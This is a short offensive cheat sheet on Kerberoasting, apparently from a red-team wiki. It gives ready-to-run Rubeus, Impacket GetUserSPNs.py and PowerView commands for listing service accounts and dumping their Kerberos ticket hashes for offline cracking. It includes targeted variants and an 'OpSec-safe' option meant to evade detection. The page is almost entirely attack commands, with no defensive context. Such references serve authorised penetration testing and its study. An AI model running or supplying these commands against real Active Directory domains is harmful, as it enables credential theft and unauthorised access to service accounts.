Kerberoasting

Kerberoasting with Rubeus

# Generic Kerberoasting with Rubeus 
.\Rubeus.exe kerberoast /nowrap

# Generic Kerberoasting and saving the output to a file
.\Rubeus.exe kerberoast /nowrap /outfile:C:\Windows\Tasks\kerberoast.txt

# Perform targeted Kerberoasting with Rubeus
.\Rubeus.exe kerberoast /user:$serviceaccount

# OpSec-safe Kerberoasting with the 'tgtdeleg' trick, filtering out AES-enabled accounts
.\Rubeus.exe kerberoast /rc4opsec

Kerberoasting with Impacket

# List accounts with SPNs
GetUserSPNs.py $domain/$username:$password -dc-ip $dcip

# Generic Kerberoasting with Impacket
GetUserSPNs.py $domain/$username:$password -dc-ip $dcip -request

# Targeted Kerberoast
GetUserSPNs.py $domain/$username:$password -dc-ip $dcip /user:$serviceaccount -request

Kerberoasting with PowerView

# Generic Kerberoast with PowerView
Invoke-Kerberoast | fl

# Specify Domain in Kerberoast
Invoke-Kerberoast -Domain $domain | fl

References

KerberoastingRed Teaming Experiments

Kerberoast with OpSecMicrosoft 365 Security

PreviousAS-REP Roasting NextKerberos Relaying

Last updated 2 years ago